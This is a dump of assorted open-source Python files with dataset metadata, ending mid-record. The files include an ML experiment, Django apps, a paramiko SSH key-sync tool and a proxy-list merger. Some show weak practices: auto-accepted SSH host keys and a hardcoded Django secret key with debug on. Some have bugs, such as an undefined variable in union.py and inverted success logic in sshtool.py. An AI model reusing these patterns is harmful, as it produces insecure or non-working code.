blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7cbadac299d6d1aa1aa7c1bf6d8c12eef42f1ec9
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/dnce/synth8.py
|
09101dc78c48d9e56e0944a1335bcecf7fe268ec
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189
| 2018-12-12T16:27:09
| 2018-12-12T16:27:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,399
|
py
|
#An experiment with synthetic data to test whether DNCE works.
#For the data-dependent noise model we use additive gaussian noise
#The data is just samples from a zero mean, unit precision univariate
#gaussian. We initialize the model with the wrong precision and see
#how close we can come to recovering the correct precision, and which
#noise precisions are the best.
#Imports
from matplotlib import pyplot as plt
from pylearn2.optimization.batch_gradient_descent import BatchGradientDescent
from pylearn2.models.mnd import DiagonalMND
from pylearn2.models.mnd import kl_divergence
from pylearn2.distributions.mnd import MND
from pylearn2.distributions.mnd import AdditiveDiagonalMND
import numpy as np
from pylearn2.utils import sharedX
from theano import function
from pylearn2.costs.ebm_estimation import NCE
from galatea.dnce.dnce import DNCE
import theano.tensor as T
#====Options controlling the experiment=========
#the dimension of the data
dim = 100
#number of training examples
m = 20
#number of noise examples per training example
noise_per_clean = 30
#the parameters of the data distribution
true_mu = 1.
# NOTE(review): true_mu is defined but the data distribution below is built
# with mu = np.zeros((dim,)) and the "true" model with init_mu = 0. --
# confirm whether true_mu was meant to be used.
true_beta = 1.
#for each of the noise components, we try
#num_beta different values of beta, spaced
#uniformly in log space from 10^min_exp
#to 10^max_exp
num_beta = 5
min_exp = -.5
max_exp = 0.1
#number of trials to run
trials = 3
#Generate the values of beta to consider
# (equivalent to a log-spaced grid of num_beta points in [10^min_exp, 10^max_exp])
idxs = np.arange(num_beta)
pos = idxs / float(num_beta-1)
scaled_shifted = pos * (max_exp-min_exp) + min_exp
betas = 10 ** scaled_shifted
# accumulators: kls[trial, beta_idx] for the estimated models,
# ml_kls[trial] for the maximum-likelihood baseline
kls = np.zeros((trials,num_beta))
ml_kls = np.zeros((trials,))
for trial in xrange(trials):
    #generate the data
    data_distribution = MND( sigma = np.identity(dim) / true_beta,
            mu = np.zeros((dim,)), seed = 17 * (trial+1) )
    true = DiagonalMND( nvis = dim, init_beta = true_beta, init_mu = 0.,
            min_beta = .1, max_beta = 10.)
    # draw m samples once and freeze them in a shared variable
    X = sharedX(function([],data_distribution.random_design_matrix(m))())
    Xv = X.get_value()
    # maximum-likelihood baseline: empirical mean and precision of the sample
    mu = Xv.mean(axis=0)
    print 'maximum likelihood mu: ',mu
    diff = Xv - mu
    var = np.square(diff).mean(axis=0)
    mlbeta = 1./var
    print 'maximum likelihood beta: ',mlbeta
    ml_model = DiagonalMND( nvis = dim, init_mu = mu, init_beta = mlbeta,
            min_beta = 0.0,
            max_beta = 1e6)
    ml_kl = kl_divergence( true, ml_model)
    ml_kl = function([],ml_kl)()
    assert ml_kl >= 0.0
    ml_kls[trial] = ml_kl
    print 'maximum likelihood kl divergence:',ml_kl
    best_mse = None
    # NOTE(review): best_mse is assigned but never read below -- leftover?
    #Try each noise beta
    for idx1 in xrange(num_beta):
        beta = betas[idx1]
        print 'Running experiment for ',beta
        #Allocate a fresh model
        model = DiagonalMND(
                nvis = dim,
                init_mu = 0.,
                init_beta = .1,
                min_beta = .001,
                max_beta = 1e30)
        #Make the noise distribution
        noise_distribution = AdditiveDiagonalMND(
                init_beta = beta,
                nvis = dim
        )
        #generate the noise samples (zero-centered: noise added to zeros)
        noise_func = function([], noise_distribution.random_design_matrix(T.zeros_like(X)))
        Y = []
        for i in xrange(noise_per_clean):
            Y.append(sharedX(noise_func()))
        #Get the objective function
        nce = NCE( DiagonalMND( nvis = dim,
                init_beta = beta, init_mu = 0.,
                min_beta = beta,
                max_beta = beta),-1)
        J = nce(model,X,T.concatenate(Y,axis=0))
        #Add DNCE
        #Make the noise distribution (data-dependent: noise added to X itself)
        noise_distribution = AdditiveDiagonalMND(
                init_beta = 100.,
                nvis = dim
        )
        #generate the noise samples
        noise_func = function([], noise_distribution.random_design_matrix(X))
        Y = []
        for i in xrange(noise_per_clean):
            Y.append(sharedX(noise_func()))
        #Get the objective function; total objective is NCE + DNCE
        dnce = DNCE(noise_distribution)
        J = J + dnce(model,X,Y)
        #Minimize the objective function with batch gradient descent
        minimizer = BatchGradientDescent( objective = J,
                params = model.get_params(),
                param_constrainers = [ model.censor_updates ])
        print '\tinit obj:',minimizer.obj()
        #minimizer.verbose = True
        minimizer.minimize()
        print '\tfinal obj:',minimizer.obj()
        recovered_beta = model.beta.get_value()
        recovered_mu = model.mu.get_value()
        print '\trecovered beta:',recovered_beta
        print '\trecovered mu:',recovered_mu
        # score the fitted model against the true distribution
        kl = kl_divergence(true, model)
        kl = function([],kl)()
        assert kl >= 0.0
        print '\tkl was ',kl
        kls[trial,idx1] = kl
# Plot mean +/- std of the KL divergence across trials as a function of the
# noise precision (blue), against the maximum-likelihood baseline (green).
# NOTE(review): plt.hold was deprecated/removed in newer matplotlib -- this
# script targets an old matplotlib; confirm before upgrading.
plt.hold(True)
plt.plot(betas, kls.mean(axis=0),'b')
plt.plot(betas, kls.mean(axis=0)+kls.std(axis=0),'b--')
plt.plot(betas, kls.mean(axis=0)-kls.std(axis=0),'b--')
plt.plot(betas, ml_kls.mean() *np.ones((num_beta,)),'g')
plt.plot(betas, (ml_kls.mean()+ml_kls.std()) *np.ones((num_beta,)),'g--')
plt.plot(betas, (ml_kls.mean()-ml_kls.std()) *np.ones((num_beta,)),'g--')
plt.ylabel('KL divergence')
plt.xlabel('Noise precision')
ax = plt.gca()
ax.set_xscale('log')
plt.show()
|
[
"goodfellow.ian@gmail.com"
] |
goodfellow.ian@gmail.com
|
2aecf525c7041dcb9c7c2cf97f75b7d1334847e7
|
e2ae5c6d1d3ff9c512d526b1b4d7d7b64d50e87d
|
/py/leetcode/405.py
|
f3f4193e0aac1cae5a84217d9e3aab33fa3a9ee4
|
[] |
no_license
|
wfeng1991/learnpy
|
59ed66d0abc2947c2f73c0bfe3901ef45ba5eb56
|
e5b018493bbd12edcdcd0434f35d9c358106d391
|
refs/heads/master
| 2021-01-23T07:35:08.376547
| 2018-09-28T02:16:31
| 2018-09-28T02:16:31
| 86,430,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,278
|
py
|
class Solution(object):
    """LeetCode 405: convert an integer to its two's-complement hex string."""

    def toHex(self, num):
        """Return the 32-bit two's-complement hex representation of num.

        :type num: int
        :rtype: str
        """
        if num == 0:
            return '0'
        digits = '0123456789abcdef'
        # collect the eight nibbles, least significant first
        nibbles = [digits[(num >> shift) & 0xF] for shift in range(0, 32, 4)]
        # most significant first, then drop leading zeros
        hexstr = ''.join(reversed(nibbles))
        return hexstr.lstrip('0')

    def toHex1(self, num):
        """Alternative: peel off low nibbles until num is exhausted (max 8).

        :type num: int
        :rtype: str
        """
        if num == 0:
            return '0'
        digits = '0123456789abcdef'
        pieces = []
        rounds = 0
        while num != 0 and rounds < 8:
            pieces.append(digits[num & 0xF])
            num >>= 4
            rounds += 1
        return ''.join(reversed(pieces))
print(Solution().toHex(0))
|
[
"jkwangfeng@qq.com"
] |
jkwangfeng@qq.com
|
1496d3188e68081c95d6988cf1f24525fc62d41d
|
2fc6766f36a9f8c0abc536d7c582102315bce1ba
|
/services/common/msg_service.py
|
e95e8e47df679ced6c81046bc1978d23e4e00521
|
[
"MIT"
] |
permissive
|
freedream520/loonblog
|
0cb153f28c14cced89738e297ee909494ba057b6
|
63d1f06d04047f220f550de914e542f535bb61a3
|
refs/heads/master
| 2021-06-22T13:53:24.492717
| 2017-08-25T01:53:33
| 2017-08-25T01:53:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
import os
import multiprocessing
from multiprocessing import Process
from django.core.mail import send_mail,EmailMultiAlternatives
from services.base_service import BaseService
from services.common.auto_log_service import auto_log
import logging
logger = logging.getLogger('default')
class MsgService(BaseService):
    """
    Message service: sends plain-text and HTML e-mail from a child process
    so the calling request does not block on SMTP.
    """
    def __init__(self):
        pass

    @staticmethod
    @auto_log
    def send_email_by_process(subject, content, mail_to_list):
        """
        Send a plain-text e-mail in a background process.
        :param subject: message subject
        :param content: plain-text body
        :param mail_to_list: list of recipient addresses
        :return: (True, '') once the worker process has been started
        """
        logger.info('发送邮件:{}-{}-{}'.format(subject, content, mail_to_list))
        p = multiprocessing.Process(target=send_mail, args=(subject, content, 'LOONAPP<loonapp@163.com>', mail_to_list))
        p.start()
        return True, ''

    @staticmethod
    @auto_log
    def send_multi_email_by_process(subject, content, mail_to_list):
        """
        Send an HTML e-mail in a background process.
        :param subject: message subject
        :param content: HTML body
        :param mail_to_list: list of recipient addresses
        :return: (True, '') once the worker process has been started
        """
        logger.info('发送html邮件:{}-{}-{}'.format(subject, content, mail_to_list))
        msg = EmailMultiAlternatives(subject, content, from_email='LOONAPP<loonapp@163.com>', to=mail_to_list)
        msg.content_subtype = "html"
        p = multiprocessing.Process(target=msg.send, args=())
        p.start()
        # fix: previously returned None, inconsistent with send_email_by_process
        return True, ''
if __name__ == '__main__':
    # Manual smoke test: requires Django settings and a working SMTP backend.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings.dev")
    MsgService().send_email_by_process('test', 'testt',['blackholll@163.com'])
    MsgService().send_multi_email_by_process('test', '<a href="http://www.baidu.com">百度</a>',['blackholll@163.com'])
|
[
"blackholll@163.com"
] |
blackholll@163.com
|
d728ab2d2395985d3d16ea123321c8da086c8be3
|
e9744e750f02674235bb2748bf6b2f88b2b6015e
|
/python/ql/test/query-tests/analysis/suppression/test.py
|
17c495ff1a44ed622ff66cbb2aadb5b62b51767e
|
[
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"MIT"
] |
permissive
|
lecoursen/codeql
|
88b9887cfa3021b19aa3fa881ec2fc0160dc8ce7
|
0f710b1981031a00f8f223effe57a7da5e66b727
|
refs/heads/main
| 2023-04-02T21:08:39.295521
| 2021-03-29T17:18:45
| 2021-03-29T17:18:45
| 352,731,731
| 12
| 0
|
MIT
| 2021-03-29T17:40:05
| 2021-03-29T17:40:05
| null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
# Formatting tests:
"" # lgtm
"" # lgtm[py/line-too-long]
"" # lgtm[py/line-too-long, py/non-callable-called]
"" # lgtm[@tag:security]
"" # lgtm[@tag:security,py/line-too-long]
"" # lgtm[@expires:2017-06-11]
"" # lgtm[py/non-callable-called] because I know better than lgtm
"" # lgtm: blah blah
"" # lgtm blah blah #falsepositive
"" # lgtm blah blah -- falsepositive
"" #lgtm [py/non-callable-called]
"" # lgtm[]
"" # lgtmfoo
"" #lgtm
"" # lgtm
"" # lgtm [py/line-too-long]
"" # lgtm lgtm
#lgtm -- Ignore this -- No line or scope.
#On real code:
def foo(): #lgtm [func]
# lgtm -- Blank line (ignore for now, maybe scope wide in future).
"docstring" # lgtm on docstring
return { #lgtm [py/duplicate-key-in-dict]
"a": 1,
"a": 2
}
class C: # lgtm class
def meth(self): # lgtm method
pass
"" #noqa
"" # noqa
"The following should be ignored"
"" # flake8: noqa
"" # noqa: F401
"" # noqa -- Some extra detail.
"" #Ignore
#Suppression for multiple tools
#LGTM-1929
class frozenbidict(BidictBase): # noqa: E501; (line too long) pylint: disable=invalid-name; lgtm [py/missing-equals]
pass
"" # noqa: E501; (line too long) pylint: disable=invalid-name; lgtm
"" # random nonsense lgtm [py/missing-equals] and then some more commentary...
# Case insensitive comments
"" # LGTM
"" # LGTM[py/line-too-long]
#Avoid some erroneous matches
"" # foolgtm[py/missing-equals]
"" # foolgtm
"" # lgtm[py/line-too-long] and lgtm[py/non-callable-called]
"" # lgtm[py/line-too-long]; lgtm
|
[
"mark@hotpy.org"
] |
mark@hotpy.org
|
d9c24f7f6e438efd40050a757067aa092a6f3a23
|
c083825cabec4920e3e24ea79d907112b1b3497d
|
/bin/sshtool.py
|
876c0c2e650d46eeeb54cfbaa7509a8c1a1ade80
|
[] |
no_license
|
fsxchen/ssh-tool
|
bf767187c8c8354a39dc1f6e211fe96999cafec8
|
b5e65b4f071ff7494d8c75a7885d8acc70701c54
|
refs/heads/master
| 2021-01-18T22:47:36.032425
| 2016-11-23T09:40:27
| 2016-11-23T09:40:27
| 62,549,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,740
|
py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import pwd
import getpass
from paramiko import SSHClient
from paramiko import AutoAddPolicy, SSHException
client = SSHClient()
# client.load_system_host_keys()
LOCAL_USER_NAME = pwd.getpwuid(os.getuid()).pw_name
def sync_public_key(host, port=22, username=None, password=None):
    """Upload the local user's id_rsa.pub to the remote host over SFTP.

    NOTE(review): the 'port' parameter is accepted but never passed to
    client.connect() -- non-default ports will not work; confirm intent.
    """
    try:
        # First attempt: connect relying on already-known host keys.
        client = SSHClient()
        client.connect(hostname=host, username=username, password=password)
    except SSHException, e:
        # Unknown/missing host key: retry with a client that auto-accepts it.
        client.close()
        client = SSHClient()
        client.set_missing_host_key_policy(AutoAddPolicy())
        client.connect(hostname=host, username=username, password=password)
    sftp_client = client.open_sftp()
    # local public key of the user running this script
    id_rsa_pub = "/home/%s/.ssh/id_rsa.pub" % LOCAL_USER_NAME
    if username == "root":
        remote_rsa_pub = "/root/.ssh/%s.pub" % (LOCAL_USER_NAME)
    else:
        remote_rsa_pub = "/home/%s/.ssh/%s.pub" % (username, LOCAL_USER_NAME)
    print remote_rsa_pub
    try:
        sftp_client.put(id_rsa_pub , remote_rsa_pub)
    except Exception, e:
        """
        if the remote host did have .ssh dirctory
        """
        # NOTE(review): the append-to-authorized_keys below runs only when the
        # upload FAILED, while the success path just prints "OK!" -- this
        # looks inverted (append should follow a successful put); confirm.
        print e
        remote_authorized_keys = os.path.join(os.path.dirname(remote_rsa_pub), "authorized_keys")
        remote_cmd = "cat %s >> %s && echo OK" % (remote_rsa_pub, remote_authorized_keys)
        stdin, stdout, stderr = client.exec_command(remote_cmd)
        # pirnt stdin
    else:
        print("OK!")
def main():
    """Parse [user@]host from argv, prompt for credentials, sync the key."""
    username, ip = None, None
    if len(sys.argv) < 2:
        print("usage: %s <ipaddress>" % sys.argv[0])
        sys.exit(-1)
    if "@" in sys.argv[1]:
        username, ip = sys.argv[1].split("@")
    else:
        ip = sys.argv[1]
    if not username:
        username = raw_input("Input username:")
    # renamed from 'pwd' so it no longer shadows the module-level 'pwd' import
    password = getpass.getpass("password:")
    sync_public_key(ip, 22, username, password)
if __name__ == '__main__':
main()
|
[
"--global"
] |
--global
|
2c8a7ffc46f660df02634a1f90d9b9bf6f612e88
|
d8a1e25c1af97abc651e1fc7883adb201c85eac2
|
/income/urls.py
|
ac6abd25555e12b9f704c72ad1ea0d459fb5822c
|
[] |
no_license
|
taeheechoi/python-incomeexpense-api
|
710709fa29418f038e9dd68f453eec3d43e646a6
|
c3f95d7c02ab897f6b7ccb0fdca184c4fb877aa3
|
refs/heads/main
| 2023-07-13T21:03:43.876212
| 2021-08-16T01:37:02
| 2021-08-16T01:37:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from django.urls import path
from . import views

# URL routes for the income app.
urlpatterns = [
    # collection endpoint -> IncomeListAPIView
    path('', views.IncomeListAPIView.as_view(), name='incomes'),
    # single-record endpoint, keyed by integer id -> IncomeDetailAPIView
    path('<int:id>', views.IncomeDetailAPIView.as_view(), name='income'),
]
|
[
"dadac76@hotmail.com"
] |
dadac76@hotmail.com
|
8e51c1b3480b0e04785035065d04d12fb381a05b
|
2a922e742c5a914b8eea504f992b2f253944cb4f
|
/Importing-data-in-python-part-2_course6/importing-data-from-the-internet_lesson-1/Turning_a_webpage_into_data_using_BeautifulSoup_getting_the_hyperlinks.py
|
86a757203ef257a2004b34601ef84f4981427a5d
|
[] |
no_license
|
anujaraj10/DataCampPythonCourses
|
f2bc7a0d4062c056f920c45fbd454227874aca1f
|
51e74bf15703dfeae49ab1c64c5e680819a425cc
|
refs/heads/master
| 2021-08-16T22:04:53.310531
| 2017-11-20T11:11:22
| 2017-11-20T11:11:22
| 108,404,625
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
#In this exercise, you'll figure out how to extract the URLs of the hyperlinks from the BDFL's webpage. In the process, you'll become close #friends with the soup method find_all().
#Instructions
#Use the method find_all() to find all hyperlinks in soup, remembering that hyperlinks are defined by the HTML tag <a>; store the result in the #variable a_tags.
#The variable a_tags is a results set: your job now is to enumerate over it, using a for loop and to print the actual URLs of the hyperlinks; to #do this, for every element link in a_tags, you want to print() link.get('href').
# Import packages
import requests
from bs4 import BeautifulSoup

# Specify url
url = 'https://www.python.org/~guido/'

# Package the request, send the request and catch the response: r
r = requests.get(url)

# Extracts the response as html: html_doc
html_doc = r.text

# Create a BeautifulSoup object from the HTML: soup.
# Fix: name the parser explicitly so bs4 does not emit GuessedAtParserWarning
# and the result does not depend on which parsers happen to be installed.
soup = BeautifulSoup(html_doc, 'html.parser')

# Print the title of Guido's webpage
print(soup.title)

# Find all 'a' tags (which define hyperlinks): a_tags
a_tags = soup.find_all('a')

# Print the URLs to the shell
for link in a_tags:
    print(link.get('href'))
|
[
"anujaraj10@gmail.com"
] |
anujaraj10@gmail.com
|
98ea4e85d3a130b7d8ed60081050f61defefe8fe
|
34ef83114e02b173bd2d55eb53ad399e738a8e3c
|
/django/search2/sample_app/sample_app/settings.py
|
76e5f88c03cc4cee9ab9e147c3eecc5b148713bc
|
[] |
no_license
|
vavilon/Python3
|
e976a18eb301e4953696d1e3f4730ed890da015a
|
8c79729747ce51d60ad685e6a2e58292954ed7eb
|
refs/heads/master
| 2023-01-09T13:44:37.408601
| 2018-01-25T22:41:14
| 2018-01-25T22:41:14
| 100,892,055
| 0
| 1
| null | 2022-12-26T20:29:27
| 2017-08-20T22:23:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,220
|
py
|
"""
Django settings for sample_app project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
lib_path = os.path.abspath(os.path.join(BASE_DIR, '../'))
sys.path.append(lib_path)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*&z9_n^drew!pd)znnyfvhp9#uk)i&)di=7^8buvjktc243*q0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'actors',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sample_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sample_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"overon4ek@gmail.com"
] |
overon4ek@gmail.com
|
a50bdabdce5a97a9861b18e6086594080a3a8d8e
|
03abf1d207d8e2d2f9387617dcf7cd49663cf41d
|
/tests/test_array.py
|
5100f412a996f6570749db525fd3c809235b2093
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mgeier/sfs-python
|
8cd1bd3d7fd2737de53fdf78d3cbfd1d0b89297f
|
c89f53d08a1f631e41dfe39f6cafe57c8ca48055
|
refs/heads/master
| 2021-07-13T18:02:01.732602
| 2019-09-04T12:45:40
| 2019-09-04T12:45:40
| 228,433,867
| 0
| 0
|
MIT
| 2019-12-16T16:58:08
| 2019-12-16T16:58:07
| null |
UTF-8
|
Python
| false
| false
| 2,107
|
py
|
import numpy as np
from numpy.testing import assert_array_equal
import pytest
import sfs
def vectortypes(*coeffs):
return [
list(coeffs),
tuple(coeffs),
np.array(coeffs),
np.array(coeffs).reshape(1, -1),
np.array(coeffs).reshape(-1, 1),
]
def vector_id(vector):
if isinstance(vector, np.ndarray):
return 'array, shape=' + repr(vector.shape)
return type(vector).__name__
@pytest.mark.parametrize('N, spacing, result', [
(2, 1, sfs.array.SecondarySourceDistribution(
x=[[0, -0.5, 0], [0, 0.5, 0]],
n=[[1, 0, 0], [1, 0, 0]],
a=[1, 1],
)),
(3, 1, sfs.array.SecondarySourceDistribution(
x=[[0, -1, 0], [0, 0, 0], [0, 1, 0]],
n=[[1, 0, 0], [1, 0, 0], [1, 0, 0]],
a=[1, 1, 1],
)),
(3, 0.5, sfs.array.SecondarySourceDistribution(
x=[[0, -0.5, 0], [0, 0, 0], [0, 0.5, 0]],
n=[[1, 0, 0], [1, 0, 0], [1, 0, 0]],
a=[0.5, 0.5, 0.5],
)),
])
def test_linear_with_defaults(N, spacing, result):
a = sfs.array.linear(N, spacing)
assert a.x.dtype == np.float64
assert a.n.dtype == np.float64
assert a.a.dtype == np.float64
assert_array_equal(a.x, result.x)
assert_array_equal(a.n, result.n)
assert_array_equal(a.a, result.a)
def test_linear_with_named_arguments():
a = sfs.array.linear(N=2, spacing=0.5)
assert_array_equal(a.x, [[0, -0.25, 0], [0, 0.25, 0]])
assert_array_equal(a.n, [[1, 0, 0], [1, 0, 0]])
assert_array_equal(a.a, [0.5, 0.5])
@pytest.mark.parametrize('center', vectortypes(-1, 0.5, 2), ids=vector_id)
def test_linear_with_center(center):
a = sfs.array.linear(2, 1, center=center)
assert_array_equal(a.x, [[-1, 0, 2], [-1, 1, 2]])
assert_array_equal(a.n, [[1, 0, 0], [1, 0, 0]])
assert_array_equal(a.a, [1, 1])
@pytest.mark.parametrize('orientation', vectortypes(0, -1, 0), ids=vector_id)
def test_linear_with_center_and_orientation(orientation):
a = sfs.array.linear(2, 1, center=[0, 1, 2], orientation=orientation)
assert_array_equal(a.x, [[-0.5, 1, 2], [0.5, 1, 2]])
|
[
"Matthias.Geier@gmail.com"
] |
Matthias.Geier@gmail.com
|
4ece04618e14620c18d05f65a12122fcf3f71fca
|
996fd22214f9d83ecdb0163e6f38568c4596bf56
|
/union.py
|
88c0950145a20502c5634d6cac8d9a5bdd7d913c
|
[] |
no_license
|
1024Person/ProxyPool
|
cdabe5d6e29fd98109e4ae1dbb86391bb511310f
|
1ec3a79ca02f5e7d6d3d39bb34d6ba922a217a55
|
refs/heads/master
| 2023-03-21T19:16:30.370551
| 2021-03-14T05:24:52
| 2021-03-14T05:24:52
| 344,514,686
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
# 整合模块
# 发现在扩展的时候,因为这个只调用调度模块,导致第二个调度模块的检查器会将之前检查的代理ip再次检查一遍这样非常的费事,
# 已经检查过一次了就不需要在重复检查了,所以这里有两个解决方案:
# 1、重构scheduler模块,让他可以实现多个爬取器,然后一个检查器
# 2、添加整合模块,将每一个调度器的爬取器,爬去下来的ip存放到不同的文件中,然后检查的时候也只是检查这个调度器下的文件中的ip,
# 所有的调度器都结束工作之后,利用整合模块将所有文件中的ip整合到一个文件中
import sys
import os
import pandas as pd
from scheduler import Scheduler
import extension
from setting import csv_file_path
class Union(object):
    """Merge the per-scheduler proxy CSV files into the main pool file.

    :param file_list: paths of the intermediate CSV files to merge
    :param is_del_file: delete the intermediate files after merging
                        (default False)
    """
    def __init__(self, file_list, is_del_file=False):
        self.file_list = file_list
        self.perpare_work()
        self.is_del_file = is_del_file

    def perpare_work(self):
        """Deduplicate file_list and drop paths that do not exist.

        Fix: the original removed elements from self.file_list while
        iterating over it, which silently skips the element following each
        removal; rebuilding the list avoids that.
        """
        unique_paths = list(set(self.file_list))
        self.file_list = [p for p in unique_paths if os.path.exists(p)]

    def run(self):
        """Concatenate ip/scores rows from every file, append to the pool."""
        df = pd.DataFrame(data=[], columns=["ip", "scores"])
        for file_path in self.file_list:
            file_ips = self.read(file_path)
            if file_ips is not None:
                # pd.concat replaces DataFrame.append (removed in pandas 2.0)
                df = pd.concat([df, file_ips])
        # append everything to the main proxy-pool CSV, no header/index
        df.to_csv(csv_file_path, index=None, mode='a', columns=None, header=False)
        print("文件整合成功")
        if self.is_del_file:
            print("正在删除临时文件。。。")
            self.delete_file()
            print("临时文件删除成功")

    def delete_file(self):
        """Remove every intermediate file that was merged."""
        for file_path in self.file_list:
            print(f"正在删除{file_path}")
            os.remove(file_path)

    def read(self, file_path):
        """Read one CSV as a two-column (ip, scores) frame; None on failure."""
        try:
            dt = pd.read_csv(file_path)
            dt.columns = ["ip", "scores"]
            return dt
        except Exception:  # narrowed from bare except: keep SystemExit etc. alive
            return None
if __name__ == "__main__":
current_path = os.path.dirname(os.path.abspath(__file__))
# f_path = current_path+"\\89_ip.csv"
f_name = ["\\qingting.csv",'\\kuai.csv',"\\89_ip.csv","\\tomato.csv"]
f_path_list = [current_path+_ for _ in f_name]
kuai_scheduler = Scheduler(ip_from="web",base_url=extension.kuai_base_url,crawler_parse_fn=extension.kuai_parse,crawler_pages=200,save_m="a",save_path=f_path_list[1],client_path=f_path_list[1],name="快代理调度器")
kuai_scheduler.start_scheduler()
kuai_scheduler.shutdown()
qingting_scheduler = Scheduler(ip_from="web",base_url=extension.qingting_base_url,crawler_pages=4,crawler_parse_fn=extension.qingting_parse,save_path=f_path_list[0],save_m="a",client_path=f_path_list[0],name="蜻蜓代理调度器")
qingting_scheduler.start_scheduler()
qingting_scheduler.shutdown()
_89_scheduler = Scheduler(ip_from='web',base_url=extension._89_base_url,crawler_pages=10,crawler_parse_fn=extension._89_parse,save_m='a',save_path=f_path[1],client_path=f_path[1],name="89代理调度器")
_89_scheduler.start_scheduler()
_89_scheduler.shutdown()
tomato_scheduler = Scheduler(ip_from='web',base_url=extension._89_base_url,crawler_pages=10,crawler_parse_fn=extension._89_parse,save_m='a',save_path=f_path[2],client_path=f_path[2],name="番茄代理调度器")
tomato_scheduler.start_scheduler()
tomato_scheduler.shutdown()
union = Union(f_path_list,True)
union.run()
|
[
"239903524@qq.com"
] |
239903524@qq.com
|
e995a49bf1c95011475c2e732e5b352d136705b9
|
5b8d55b89f7f33e1a2dcdd36e406eee8334e4678
|
/convert.py
|
f0a9ce47e91333881d030eebe5a88d1e59fa885e
|
[] |
no_license
|
manasRK/document_rating
|
b9fda56511d8cbe0a438a924718ca1e6fb63a154
|
e3caced4586c058d8239235cfe44fac6802e097f
|
refs/heads/master
| 2020-04-08T17:33:07.090176
| 2015-11-12T07:12:36
